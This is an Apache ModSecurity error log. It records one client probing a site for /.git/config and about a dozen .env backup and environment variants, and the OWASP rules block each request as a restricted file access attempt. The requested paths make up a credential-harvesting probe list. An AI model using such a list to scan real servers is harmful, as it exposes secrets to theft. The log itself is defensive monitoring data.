[Mon May 11 17:22:36.732033 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agH0PEWKUxpmnkK7zHySDwAAAQs"]
[Mon May 11 17:22:36.732650 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agH0PEWKUxpmnkK7zHySDwAAAQs"]
[Mon May 11 17:22:36.733169 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agH0PEWKUxpmnkK7zHySDwAAAQs"]
[Mon May 11 17:22:37.059015 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agH0PUWKUxpmnkK7zHySEQAAAQs"]
[Mon May 11 17:22:37.059524 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agH0PUWKUxpmnkK7zHySEQAAAQs"]
[Mon May 11 17:22:37.059749 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agH0PUWKUxpmnkK7zHySEQAAAQs"]
[Mon May 11 17:22:37.224248 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agH0PUWKUxpmnkK7zHySEgAAAQs"]
[Mon May 11 17:22:37.224664 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agH0PUWKUxpmnkK7zHySEgAAAQs"]
[Mon May 11 17:22:37.224859 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agH0PUWKUxpmnkK7zHySEgAAAQs"]
[Mon May 11 17:22:37.386414 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agH0PUWKUxpmnkK7zHySEwAAAQs"]
[Mon May 11 17:22:37.386809 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agH0PUWKUxpmnkK7zHySEwAAAQs"]
[Mon May 11 17:22:37.387007 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agH0PUWKUxpmnkK7zHySEwAAAQs"]
[Mon May 11 17:22:37.548231 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agH0PUWKUxpmnkK7zHySFAAAAQs"]
[Mon May 11 17:22:37.548684 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agH0PUWKUxpmnkK7zHySFAAAAQs"]
[Mon May 11 17:22:37.548892 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agH0PUWKUxpmnkK7zHySFAAAAQs"]
[Mon May 11 17:22:37.711722 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agH0PUWKUxpmnkK7zHySFQAAAQs"]
[Mon May 11 17:22:37.712128 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agH0PUWKUxpmnkK7zHySFQAAAQs"]
[Mon May 11 17:22:37.712349 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agH0PUWKUxpmnkK7zHySFQAAAQs"]
[Mon May 11 17:22:37.873928 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agH0PUWKUxpmnkK7zHySFwAAAQs"]
[Mon May 11 17:22:37.874437 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agH0PUWKUxpmnkK7zHySFwAAAQs"]
[Mon May 11 17:22:37.874685 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agH0PUWKUxpmnkK7zHySFwAAAQs"]
[Mon May 11 17:22:38.036100 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agH0PkWKUxpmnkK7zHySGAAAAQs"]
[Mon May 11 17:22:38.036593 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agH0PkWKUxpmnkK7zHySGAAAAQs"]
[Mon May 11 17:22:38.036820 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agH0PkWKUxpmnkK7zHySGAAAAQs"]
[Mon May 11 17:22:38.198400 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agH0PkWKUxpmnkK7zHySGQAAAQs"]
[Mon May 11 17:22:38.198850 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agH0PkWKUxpmnkK7zHySGQAAAQs"]
[Mon May 11 17:22:38.199051 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agH0PkWKUxpmnkK7zHySGQAAAQs"]
[Mon May 11 17:22:38.361106 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agH0PkWKUxpmnkK7zHySGgAAAQs"]
[Mon May 11 17:22:38.361620 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agH0PkWKUxpmnkK7zHySGgAAAQs"]
[Mon May 11 17:22:38.361853 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agH0PkWKUxpmnkK7zHySGgAAAQs"]
[Mon May 11 17:22:38.525882 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agH0PkWKUxpmnkK7zHySGwAAAQs"]
[Mon May 11 17:22:38.526385 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agH0PkWKUxpmnkK7zHySGwAAAQs"]
[Mon May 11 17:22:38.526615 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agH0PkWKUxpmnkK7zHySGwAAAQs"]
[Mon May 11 17:22:38.688391 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agH0PkWKUxpmnkK7zHySHAAAAQs"]
[Mon May 11 17:22:38.688831 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agH0PkWKUxpmnkK7zHySHAAAAQs"]
[Mon May 11 17:22:38.689045 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agH0PkWKUxpmnkK7zHySHAAAAQs"]
[Mon May 11 17:22:38.850428 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agH0PkWKUxpmnkK7zHySHQAAAQs"]
[Mon May 11 17:22:38.850907 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agH0PkWKUxpmnkK7zHySHQAAAQs"]
[Mon May 11 17:22:38.851121 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agH0PkWKUxpmnkK7zHySHQAAAQs"]
